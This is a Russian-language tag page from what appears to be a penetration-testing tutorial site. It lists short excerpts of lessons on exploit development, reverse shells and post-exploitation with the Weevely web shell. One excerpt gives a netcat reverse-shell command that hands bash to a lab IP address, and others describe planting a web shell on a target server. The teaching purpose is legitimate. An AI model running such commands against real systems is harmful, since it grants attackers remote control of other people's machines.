Метка: обратный шелл

Exploit Development, Разработка эксплойтов, Эксплойты

#3 Разработка эксплойтов – Начало.

Пожалуй, начнем еще одну вводную лекцию. Я понимаю, что создание эксплойтов, глядя на коды операции сборки в отладчике, может быть очень пугающей или сложной задачей, и это может быть за пределами Вашей зоны комфорта.

Итак, мы собираемся охватить некоторые очень …

Kali Linux

#48 Kali Linux для начинающих. Что такое Reverse (обратный) шелл?

Позвольте продемонстрировать как выглядит Reverse Shell. Вместо того, чтобы прослушивать порт, я скажу, запусти bash шелл. Нужно в адресной строке указать айпи адрес машины на Kali Linux и на порт 1234:

nc -e /bin/bash 192.168.119.128 1234

После того, как я нажму клавишу «…

Пост-эксплуатация

#8 После атаки. Устанавливаем обратное соединение с помощью Weevely. Пост-эксплуатация.

В этом уроке мы рассмотрим, как установить обратное соединение с помощью шелла Weevely. В данный момент мы уже загрузили шелл Weevely, и подключаемся к нему напрямую:

в некоторых случаях Вы не сможете запустить некоторые команды таким способом, т.е. сейчас я …

Пост-эксплуатация

#3 После атаки. Переходим из обратной оболочки (reverse shell) в Shell Weevely (оболочку Weevely).

Здравствуйте, дорогие друзья. Я уже упоминал Вам об инструменте, который называется Weevely, и если мы внедрим шелл Weevely на целевой веб-сервер, то мы сможем использовать различные полезные команды.

В этом уроке мы рассмотрим, как преобразовать простой шелл, в шелл Weevely. …

Пост-эксплуатация

#2 Работаем c обратным шеллом (reverse shell). Пост-эксплуатация.

Сейчас у нас есть полноценный bash shell, и мы можем запускать различные команды:

Я не буду рассматривать некоторые команды, так как Вы их уже знаете, но покажу несколько полезных команд, которые уместны в данной ситуации. Здесь все зависит от страницы, …